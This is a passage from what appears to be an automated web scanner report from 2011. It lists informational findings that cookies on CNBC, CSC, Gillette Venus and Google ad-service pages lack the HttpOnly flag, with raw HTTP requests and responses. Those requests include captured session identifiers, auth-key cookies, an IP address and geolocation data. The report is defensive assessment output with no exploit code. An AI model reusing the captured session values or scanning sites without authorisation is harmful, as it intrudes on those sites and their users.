Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc5CZLOLbsDADnCVB%2fPbg0Qo%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fk2EwXOuiXD0=; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339076706; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CCNBC%252520U.S.%252520T%25257C%25257C15837856%25257CCNBC%252520U.S.%252520Television%25252C%252520TV%252520Schedule%252520for%252520Primetime%252520Te%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15838394%2526ot%253DA

Response

13.203. http://www.cnbc.com/id/15839263/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/15839263/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vR9Dq3E7N%2f0PZHYpJjzP7Ec%3d; path=/
cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FWozWH53xFGc=; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/15839263/ HTTP/1.1
Host: www.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.204. http://www.cnbc.com/pointrollads.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/pointrollads.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vdxuU1kQdgmk3WPEusCCQGY%3d; path=/
cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F0G3LU09Tixk=; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pointrollads.htm HTTP/1.1
Host: www.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.205. http://www.csc.com/cybersecurity/contact_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/cybersecurity/contact_us

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cybersecurity/contact_us HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/contact_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.6.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:26 GMT
Status: 200
ETag: "4c56494684a77f8dc752e50b92174ca2"
X-Cache: MISS
X-Runtime: 47
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:26 GMT
Expires: Wed, 07 Sep 2011 16:09:26 GMT
Vary: Accept-Encoding
Content-Length: 8060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

13.206. http://www.csc.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Ddirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT
visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26traffic_source%3Ddirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=xss HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.1.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; visitor_action=content_id%3D29513%26zone_id%3D509%26content_type_id%3D13%26visits%3D1%26traffic_source%3Dreferral%26referrer%3Dwww.oracle.com/openworld/tools/mobile/index.html; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:57 GMT
Status: 200
ETag: "1673c8635aa207a1de3af02d09940037"
X-Runtime: 14
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Ddirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26traffic_source%3Ddirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT
Set-Cookie: _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; path=/; HttpOnly
Expires: Wed, 07 Sep 2011 16:08:57 GMT
Vary: Accept-Encoding
Content-Length: 9018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

13.207. http://www.csc.com/services previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/services

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:05 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Creferral%26content_type_id%3D13%26visits%3D1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.2.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; s_sess=%20s_cc%3Dtrue%3B%20ev4%3Dxss%3B%20s_sq%3Dcsccom%253D%252526pid%25253DSearch%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/services%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:05 GMT
Status: 200
ETag: "fb1aa7a72cdf1607fbfd2a5107efce65"
X-Cache: MISS
X-Runtime: 33
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Creferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:05 GMT
Expires: Wed, 07 Sep 2011 16:09:05 GMT
Vary: Accept-Encoding
Content-Length: 9996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

13.208. http://www.csc.com/utils/live_search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/utils/live_search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Dreferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/live_search?q=xss HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.1.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; visitor_action=content_id%3D29513%26zone_id%3D509%26content_type_id%3D13%26visits%3D1%26traffic_source%3Dreferral%26referrer%3Dwww.oracle.com/openworld/tools/mobile/index.html; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:57 GMT
Status: 200
ETag: "6855c96cfed8218fbfb755df41adf389"
X-Runtime: 3
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26zone_id%3D509%26traffic_source%3Dreferral%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:08:57 GMT
Set-Cookie: _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; path=/; HttpOnly
Expires: Wed, 07 Sep 2011 16:08:57 GMT
Vary: Accept-Encoding
Content-Length: 2083

<a href="http://assets1.csc.com/es/downloads/7380_2.pdf?ref=ls">7380_2.pdf</a> <br />

<b>...</b> technologies. And the eThreat ...winners... are: ... Web application exploits,<br> partic
...[SNIP]...

13.209. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/buy_it_now/product_links.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:34 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/buy_it_now/product_links.jsp?upc=047400098978 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.2.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

13.210. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/products/refillables/embrace/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/products/refillables/embrace/index.jsp HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/search/index.jsp?q=razorphonehelpfaq
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.7.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

13.211. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/products/refillables/embrace_purple/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

13.212. http://www.gillettevenus.com/en_US/razor_finder/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/razor_finder/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:24 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/razor_finder/index.jsp HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; preferredLocale=en_US; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.3.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; bvgacefRatingsAndReviews=true

Response

13.213. http://www.gillettevenus.com/en_US/search/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/search/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:33 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/search/index.jsp?q=razor+phone+help+faq HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/razor_finder/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.5.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 16:46:33 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:33 GMT; Path=/
Location: http://www.gillettevenus.com/en_US/search/index.jsp?q=razorphonehelpfaq
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Connection: close

13.214. http://www.googleadservices.com/pagead/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Conversion=CocBQ3RFWDg1VHhtVHNOeHBiT0lBcVcyMklrUHR0RGE5UUdlXzlXNUhaZVp3TGxFQ0FBUUFTZ0RVSTdPaDdIX19fX19fd0ZneVo3LWhzaWpfQnFnQWU3SnJ2OER5QUVCcWdRY1Q5QTkwci15OUdUdW84QUlPTnNnQVIwV1RVVGxIUUJ3c3d4ZzFnEhMIp7veufiIqwIVET2DCh1iBQjVGAEg5qTVlr6Y98iGAUgB; expires=Thu, 06-Oct-2011 15:31:58 GMT; path=/pagead/conversion/1072407790/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=CtEX85TxmTsNxpbOIAqW22IkPttDa9QGe_9W5HZeZwLlECAAQASgDUI7Oh7H______wFgyZ7-hsij_BqgAe7Jrv8DyAEBqgQcT9A90r-y9GTuo8AIONsgAR0WTUTlHQBwswxg1g&ved=0CAgQ0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgiq4KTBfyLUpSABKAAw88uL57LFh-j1ATjy4fjyBED7x5jzBA&sig=AOD64_2gBFwMK1AEYNxHS3sGMa4DnXPf0Q&adurl=http://www.volusion.com/%3F_kk%3D%252Becommerce%2520%252Bsolution%26_kt%3D3fda914a-c56d-407d-b8c6-0b1636cef4d3 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CocBQ3RFWDg1VHhtVHNOeHBiT0lBcVcyMklrUHR0RGE5UUdlXzlXNUhaZVp3TGxFQ0FBUUFTZ0RVSTdPaDdIX19fX19fd0ZneVo3LWhzaWpfQnFnQWU3SnJ2OER5QUVCcWdRY1Q5QTkwci15OUdUdW84QUlPTnNnQVIwV1RVVGxIUUJ3c3d4ZzFnEhMIp7veufiIqwIVET2DCh1iBQjVGAEg5qTVlr6Y98iGAUgB; expires=Thu, 06-Oct-2011 15:31:58 GMT; path=/pagead/conversion/1072407790/
Cache-Control: private
Location: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKe73rn4iKsCFRE9gwodYgUI1Q
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 06 Sep 2011 15:31:58 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block

13.215. http://www.marykay.com/ previous next

Summary

Severity:	Information
